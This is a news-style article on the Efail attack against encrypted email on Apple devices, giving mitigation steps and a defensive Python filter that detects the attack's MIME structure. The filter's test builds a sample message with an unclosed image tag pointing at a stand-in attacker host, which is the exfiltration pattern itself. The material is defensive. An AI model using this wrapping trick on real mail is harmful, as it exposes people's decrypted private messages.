How to protect your Mac, iPhone, iPad from Efail email exploit

EFAIL lets hackers read encrypted emails on your iPhone.
Photo: Ed Hardy/Cult of Mac

Researchers in Europe have discovered a way to read the contents of encrypted emails sent with iOS and macOS devices. The so-called Efail exploit is significant enough that the Electronic Frontier Foundation calls it an “immediate risk.”

Apple is certainly working on patches for all its devices, but there are ways to protect your laptop, phone and tablet now.

Efail technical details

The Efail attack requires deliberately mis-written HTML tags, according to the researchers who discovered it. In an Efail attack, a malicious email starts with an image tag whose source attribute isn’t closed. Within the attribute is the attacker’s web domain.

Next, the attacker’s email contains the encrypted text of the email. The attacker then ends the email by closing the image tag that was previously opened.

How Efail works
The attacking email is carefully crafted. Then the decrypted text is inserted into the image tag. Finally, the resulting link shows up in the attacker’s server logs.
Photo: EFAIL.de

When the victim’s email client opens this email, it decrypts the text but also treats everything between the opening and the closing of the image tag’s source attribute as the source of the image. That includes the decrypted contents of the email.

The mail client will request the image from the attacker’s web domain. This will send the decrypted text of the email to their server, where it can be read from server logs.
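
A mail filter can look for this structure before anything is decrypted. The Python example below is an added illustration, not code from the researchers or from Apple; it assumes the three pieces arrive as consecutive MIME parts (HTML, S/MIME or PGP/MIME ciphertext, HTML), and the function names and the sample message are constructed for the example.

```python
import email
from email import policy

# Assumption: these content types mark an S/MIME or PGP/MIME encrypted part.
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted"}

def ends_inside_attribute(html):
    """True if the fragment stops inside a quoted attribute value of an open tag."""
    in_tag, quote = False, None
    for ch in html:
        if quote:                      # inside a quoted value: wait for its close
            quote = None if ch == quote else quote
        elif in_tag:
            if ch in "\"'":
                quote = ch
            elif ch == ">":
                in_tag = False
        elif ch == "<":
            in_tag = True
    return quote is not None

def find_efail_wrapping(raw):
    """Return indexes of HTML leaf parts left open right before an encrypted part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    hits = []
    for i in range(len(leaves) - 1):
        part, nxt = leaves[i], leaves[i + 1]
        if (part.get_content_type() == "text/html"
                and nxt.get_content_type() in ENCRYPTED_TYPES
                and ends_inside_attribute(part.get_content())):
            hits.append(i)
    return hits

def build_sample(first_html):
    """Constructed test message: HTML part, placeholder ciphertext part, HTML part."""
    return "\n".join([
        "MIME-Version: 1.0",
        'Content-Type: multipart/mixed; boundary="BOUNDARY"', "",
        "--BOUNDARY", "Content-Type: text/html", "", first_html,
        "--BOUNDARY", "Content-Type: application/pkcs7-mime",
        "Content-Transfer-Encoding: base64", "", "UExBQ0VIT0xERVI=",  # placeholder
        "--BOUNDARY", "Content-Type: text/html", "", '">',
        "--BOUNDARY--", ""]).encode()

if __name__ == "__main__":
    print(find_efail_wrapping(build_sample('<img src="http://attacker.example/')))
    print(find_efail_wrapping(build_sample('<img src="https://example.org/a.png">')))
```

The check is a heuristic: a stray "<" followed by a quote mark in ordinary text can trigger it, so a hit is a reason to quarantine or inspect the message rather than proof of an attack.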

How to protect your iPhone from Efail

Protecting the contents of your emails from this attack is easy but inconvenient. It requires turning off the “Load Remote Images” email feature. This is because, as described above, the exploit uses the email client’s attempt to load a remote image to grab the decrypted text of the mail.

On an iPhone, making this change requires simply going to Settings > Mail and then unchecking Load Remote Images.

How to protect your Mac from Efail

The process on a Mac is more complicated, but not beyond the abilities of the average user.

First off, make sure the macOS Mail app is closed by going to the Mail drop-down box and selecting Quit Mail. Next, open the Finder by clicking its icon in the Dock. Then open the Go drop-down box by tapping Go at the top of the page, and select Go to Folder…

In the resulting text box, enter /Library/Mail/Bundles. This will open a folder containing GPGMail.mailbundle. Delete this file. This will stop the Mail app from decrypting emails.

Anyone needing more help should read the in-depth guide to fighting Efail provided by the Electronic Frontier Foundation.

Both of these workarounds involve some inconvenience. Still, the European researchers who discovered Efail recommend them for “people in hostile environments,” which includes journalists, political activists, whistleblowers, etc.

Hopefully, Apple will quickly release iOS and macOS updates to fix the security holes that Efail exploits.